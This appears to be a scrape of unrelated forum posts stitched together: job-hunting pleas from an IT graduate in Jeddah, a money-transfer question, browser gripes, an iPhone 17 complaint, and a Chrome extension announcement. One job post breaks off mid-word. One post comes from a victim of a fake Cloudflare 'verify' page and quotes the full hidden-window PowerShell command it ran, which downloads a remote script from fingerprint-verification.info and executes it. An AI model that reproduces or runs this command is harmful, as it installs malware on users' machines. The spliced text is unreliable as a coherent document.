BSc IT graduate (3.9 GPA) + ~2 year IT support experience, but applying everywhere and barely getting responses.

Am I doing something wrong? 💀
Where are people actually finding IT jobs in Jeddah?LinkedIn, referrals, walking into companies, WhatsApp groups?

At this point I’ll take any advice 🙏

I came across a website that looked like Cloudflare and asked me to “verify” by pressing Win+X → then click I then Ctrl+V → Enter.

I stupidly followed it.

It ran:
powershell -w h "iex(irm 'fingerprint-verification.info/2dd69080fe7842ea'); Start-Sleep -Seconds 19"; exit;

I think I interrupted it before it finished, but Event ID 4104 shows the downloaded script attempted to create and execute a random .exe.

So far Defender is clean, Defender Offline Scan found nothing, and I don’t see any suspicious processes, startup items, or scheduled tasks. I have changed my passwords.

How worried should I be, and what should I check next?

I’ve been searching for an IT role in Jeddah and honestly, it’s been frustrating.

I hold BSc in IT with 1 year experience in Jeddah, looking for IT Support, Help Desk, Service Desk, or Junior IT Infrastructure roles.

I’ve been applying through LinkedIn and job sites, but also reaching out directly to companies and IT departments. The biggest challenge is finding opportunities that are open to non-Saudis/expats, especially for entry-level IT positions.

I’m not looking for anything crazy, just an opportunity to get into a good IT environment, prove myself, and grow.

If anyone here works in IT/HR, knows a company hiring, or can point me toward someone I should contact, I’d genuinely appreci

Hi everyone, I'm looking to receive some funds from abroad and the sender wants to use Ria Money Transfer because the fees are lower.

Has anyone used them in North Cyprus recently? Do you pick it up at a specific bank (like Creditwest or Limasol) or are there standalone exchange offices?

Just want to make sure it's reliable before we send the money. Thanks!

Serious question.

There are a million extensions, but what’s one thing that still annoys the hell out of you when using the browser?

What problem should already be solved by now, but somehow isn’t?

Rants welcome. I’m genuinely curious.

The iPhone 17 looks overdesigned with too many awkward curves and a camera bump that sticks out like a sore thumb. It feels less sleek and more bulky compared to previous models. Honestly, it’s losing that clean Apple aesthetic. Who else thinks Apple really dropped the ball on this one?

I missed the split-screen tab view from Microsoft Edge, so I built a free Chrome extension called SplitPilot that does the same thing, and thought some of you might find it useful. It basically lets you open two websites side by side in the same tab, so you don’t have to keep flipping back and forth.

Some things it can do:

  • Open any two sites in one tab (split view)
  • Right-click a link and send it straight to split view
  • Drag the divider to resize the panels
  • Swap, refresh, pop out, or close either side separately
  • Choose between horizontal or vertical layout
  • Light/dark themes + it
